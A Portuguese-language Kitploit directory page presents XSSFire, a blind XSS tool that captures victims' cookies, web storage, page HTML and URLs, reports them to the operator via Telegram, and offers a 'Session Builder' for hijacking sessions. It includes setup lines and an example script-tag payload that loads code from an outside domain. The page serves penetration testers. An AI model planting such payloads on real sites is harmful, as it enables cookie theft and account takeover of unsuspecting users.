Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
XSSFire — Um script Blind XSS autônomo. | Kitploit
Ferramentas/GitHubGitHub/seifelsallamy/xssfire
ExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesSegurança WebTestes de Penetração
GitHubseifelsallamy/xssfire

XSSFire

Um script Blind XSS autônomo.

Ver Repositório
47104há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

XSSFire

Um script Blind XSS independente.

Como funciona:

O script é uma combinação de PHP e JavaScript; ele captura os dados usando JS e os envia para o próprio script, que então gera arquivos de relatório e os entrega via Telegram.

Requisitos:

  1. Servidor Web rodando em Linux com um domínio e um certificado SSL.
  2. Conta no Telegram (para receber relatórios BXSS)

Por que Telegram?

Fácil de configurar. Rápido. Acessível.

Recursos:

  1. Captura: IP, User-Agent, Data-Hora, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, se acionado a partir de um Iframe
  2. Session Builder: Um JavaScript que pode reconstruir a sessão, abrir a URL capturada e o devtools, depois colar no console e pressionar Enter. Se você tiver sorte, poderá assumir a sessão.
  3. Notificações via Telegram: mais rápidas e fáceis de configurar do que e-mails e mais acessíveis.
  4. Anti-Spam: você deve receber apenas uma/duas notificações para cada URL capturada. No entanto, o script é reiniciado de tempos em tempos para notificá-lo novamente mais tarde.
  5. Criptografia: você pode definir uma senha no script e o relatório que receber no Telegram será um arquivo zip protegido por senha. (Os bots do Telegram não usam criptografia de ponta a ponta).
  6. HTML Snapshot: É um arquivo HTML que será entregue junto com o relatório; deve se parecer com a página do seu alvo.

Configuração:

  1. Vá ao Telegram e converse com o @botfather.
  2. Escreva /start no chat e crie um novo bot.
  3. Você deve receber o token do seu bot ao criá-lo.
Baixar ferramenta
  • Guarde o token em um local seguro.
  • Agora vá ao chat do seu bot recém-criado, inicie-o e diga olá.
  • Em seguida, acesse: https://api.telegram.org/bot<bot_token>/getUpdates
  • E salve o seu chat id.
  • Abra o script XSSFire e modifique as seguintes linhas:
  • root@kitploit:~
    $chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
    $token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
    $password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
    
    1. Envie o script para o seu servidor.

    Para gerar payloads, você pode considerar usar o Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager Você pode simplesmente criar payloads por meio dessa extensão inserindo yourdomain.com/ no campo de domínio e clicando em Salvar.

    Nota: você pode alterar o nome do arquivo para index.php e enviá-lo para o diretório principal do seu servidor para tornar os payloads mais curtos; o payload deve então ser semelhante a este <script src="https://yourdomain.com"></script>.

    Capturas de tela:

    bxss
    bxss2
    bxss3

    Obrigado ao GPT-3 xD